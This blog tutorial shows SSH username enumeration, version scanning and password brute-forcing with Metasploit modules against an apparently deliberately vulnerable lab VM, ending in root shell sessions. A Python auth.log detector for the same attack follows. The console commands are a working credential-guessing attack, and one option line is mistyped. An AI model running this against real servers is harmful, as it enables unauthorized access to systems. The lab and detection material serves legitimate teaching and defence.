Hacking SSH with Metasploit Auxiliary Modules
SSH is another service commonly targeted by attackers, so in this post I am going to show you how to use Metasploit auxiliary modules to run a dictionary or brute-force attack against an SSH server.
First we need to find valid usernames for the password-guessing attack. We can enumerate usernames with the Metasploit auxiliary/scanner/ssh/ssh_enumusers module (it infers valid users from the server's response timing, which is what the THRESHOLD option controls):
msf auxiliary(dns_srv_enum) > use auxiliary/scanner/ssh/ssh_enumusers
msf auxiliary(ssh_enumusers) > show options
Module options (auxiliary/scanner/ssh/ssh_enumusers):
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
Proxies                     no        Use a proxy chain
RHOSTS                      yes       The target address range or CIDR identifier
RPORT      22               yes       The target port
THREADS    1                yes       The number of concurrent threads
THRESHOLD  10               yes       Amount of seconds needed before a user is considered found
USER_FILE                   yes       File containing usernames, one per line
msf auxiliary(ssh_enumusers) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(ssh_enumusers) > run
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE.
msf auxiliary(ssh_enumusers) > set USER_FILE /root/Desktop/users
USER_FILE => /root/Desktop/users
msf auxiliary(ssh_enumusers) > run
[*] 192.168.67.136:22 - SSH - Checking for false positives
[*] 192.168.67.136:22 - SSH - Starting scan
[+] 192.168.67.136:22 - SSH - User 'root' found
[!] 192.168.67.136:22 - SSH - User 'owaspbroken' not found
[!] 192.168.67.136:22 - SSH - User 'broken' not found
[!] 192.168.67.136:22 - SSH - User 'mag' not found
[!] 192.168.67.136:22 - SSH - User 'admin' not found
[!] 192.168.67.136:22 - SSH - User 'Administrator' not found
[!] 192.168.67.136:22 - SSH - User 'owaspbwa' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_enumusers) >
The username 'root' is found. Before guessing passwords, let's do one more thing.
Let's also find out the SSH server version, for future reference when looking for known vulnerabilities in that version:
msf auxiliary(ssh_enumusers) > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(ssh_version) > run
[*] 192.168.67.136:22, SSH server version: SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu4
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Now let's guess the password. Always use a good password list, otherwise it is a waste of time: password guessing over SSH is slow. Here is how we can attack the SSH server with the ssh_login module:
msf auxiliary(ssh_version) > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name              Current Setting  Required  Description
----              ---------------  --------  -----------
BLANK_PASSWORDS   false            no        Try blank passwords for all users
BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
DB_ALL_PASS       false            no        Add all passwords in the current database to the list
DB_ALL_USERS      false            no        Add all users in the current database to the list
PASSWORD                           no        A specific password to authenticate with
PASS_FILE                          no        File containing passwords, one per line
RHOSTS                             yes       The target address range or CIDR identifier
RPORT             22               yes       The target port
STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
THREADS           1                yes       The number of concurrent threads
USERNAME                           no        A specific username to authenticate as
USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
USER_AS_PASS      false            no        Try the username as the password for all users
USER_FILE                          no        File containing usernames, one per line
VERBOSE           true             yes       Whether to print output for all attempts
msf auxiliary(ssh_login) > set USER_FILE /root/Desktop/users
USER_FILE => /root/Desktop/users
msf auxiliary(ssh_login) > set USERASS_FILE true
USERASS_FILE => true
msf auxiliary(ssh_login) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(ssh_login) > run
[*] 192.168.67.136:22 SSH - Starting bruteforce
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > set PASSWORD owaspbwa
PASSWORD => owaspbwa
msf auxiliary(ssh_login) > run
[*] 192.168.67.136:22 SSH - Starting bruteforce
[+] 192.168.67.136:22 SSH - Success: 'root:owaspbwa' 'uid=0(root) gid=0(root) groups=0(root) Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 2010 i686 GNU/Linux '
[*] Command shell session 1 opened (192.168.67.139:44027 -> 192.168.67.136:22) at 2014-12-17 04:23:57 -0500
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'broken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'mag:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'admin:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'Administrator:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbwa:owaspbwa'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > set USERNAME root
USERNAME => root
msf auxiliary(ssh_login) > set PASS_FILE /root/Desktop/users
PASS_FILE => /root/Desktop/users
msf auxiliary(ssh_login) > run
[*] 192.168.67.136:22 SSH - Starting bruteforce
[+] 192.168.67.136:22 SSH - Success: 'root:owaspbwa' 'uid=0(root) gid=0(root) groups=0(root) Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 2010 i686 GNU/Linux '
[*] Command shell session 2 opened (192.168.67.139:43450 -> 192.168.67.136:22) at 2014-12-17 04:25:06 -0500
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:root'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:owaspbroken'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:broken'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:mag'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:admin'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:Administrator'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'broken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'broken:root'
[-] 192.168.67.136:22 SSH - Failed: 'broken:owaspbroken'
[-] 192.168.67.136:22 SSH - Failed: 'broken:broken'
[-] 192.168.67.136:22 SSH - Failed: 'broken:mag'
[-] 192.168.67.136:22 SSH - Failed: 'broken:admin'
[-] 192.168.67.136:22 SSH - Failed: 'broken:Administrator'
[-] 192.168.67.136:22 SSH - Failed: 'broken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'mag:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'mag:root'
[-] 192.168.67.136:22 SSH - Failed: 'mag:owaspbroken'
[-] 192.168.67.136:22 SSH - Failed: 'mag:broken'
[-] 192.168.67.136:22 SSH - Failed: 'mag:mag'
[-] 192.168.67.136:22 SSH - Failed: 'mag:admin'
[-] 192.168.67.136:22 SSH - Failed: 'mag:Administrator'
[-] 192.168.67.136:22 SSH - Failed: 'mag:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'admin:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'admin:root'
[-] 192.168.67.136:22 SSH - Failed: 'admin:owaspbroken'
[-] 192.168.67.136:22 SSH - Failed: 'admin:broken'
[-] 192.168.67.136:22 SSH - Failed: 'admin:mag'
[-] 192.168.67.136:22 SSH - Failed: 'admin:admin'
[-] 192.168.67.136:22 SSH - Failed: 'admin:Administrator'
[-] 192.168.67.136:22 SSH - Failed: 'admin:owaspbwa'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) >
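The guessing run above leaves a clear trail in the target's sshd logs, and as an added example that is not part of the original post, here is a small Python detector for that trail: it flags a source that exceeds a failure threshold inside a time window, a login accepted right after such a burst, and the spread of usernames tried from one source. The auth.log lines are constructed to mirror the session above; the 60-second window and threshold of 5 are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# OpenSSH auth.log shapes: syslog prefix, then failed / accepted password messages.
LINE_RE = re.compile(r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (.*)$")
FAIL_RE = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")
OK_RE = re.compile(r"Accepted (?:password|publickey) for (\S+) from (\S+) port \d+")

def analyze(lines, window=timedelta(seconds=60), threshold=5):
    """Return (bursts, compromises, probed) for a list of auth.log lines.
    bursts: {src: peak failures inside one window} once threshold is reached
    compromises: [(src, user)] accepted logins right after such a burst
    probed: {src: usernames tried} - many distinct names = user enumeration"""
    fails = defaultdict(deque)          # src -> timestamps of recent failures
    bursts, compromises, probed = {}, [], defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%b %d %H:%M:%S")  # year-less syslog stamp
        msg = m.group(2)
        if f := FAIL_RE.search(msg):
            user, src = f.groups()
            probed[src].add(user)
            q = fails[src]
            q.append(ts)
            while ts - q[0] > window:   # drop failures that fell out of the window
                q.popleft()
            if len(q) >= threshold:
                bursts[src] = max(bursts.get(src, 0), len(q))
        elif ok := OK_RE.search(msg):
            user, src = ok.groups()
            recent = [t for t in fails[src] if ts - t <= window]
            if len(recent) >= threshold:  # guessing burst, then success: treat as compromise
                compromises.append((src, user))
    return bursts, compromises, probed

# Constructed sample: the page's guessing run as the target's sshd would log it,
# plus one unrelated failure from another host that must not trigger an alert.
SAMPLE = """\
Dec 17 04:23:50 owaspbwa sshd[2290]: Failed password for root from 10.0.0.5 port 50001 ssh2
Dec 17 04:23:55 owaspbwa sshd[2301]: Failed password for invalid user owaspbroken from 192.168.67.139 port 44021 ssh2
Dec 17 04:23:55 owaspbwa sshd[2302]: Failed password for invalid user broken from 192.168.67.139 port 44022 ssh2
Dec 17 04:23:56 owaspbwa sshd[2303]: Failed password for invalid user mag from 192.168.67.139 port 44023 ssh2
Dec 17 04:23:56 owaspbwa sshd[2304]: Failed password for invalid user admin from 192.168.67.139 port 44024 ssh2
Dec 17 04:23:56 owaspbwa sshd[2305]: Failed password for root from 192.168.67.139 port 44025 ssh2
Dec 17 04:23:57 owaspbwa sshd[2306]: Accepted password for root from 192.168.67.139 port 44027 ssh2
""".splitlines()
```

Running `analyze(SAMPLE)` reports the burst and the root compromise from 192.168.67.139 while the single failure from 10.0.0.5 stays below the threshold.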
Let me know if you have questions!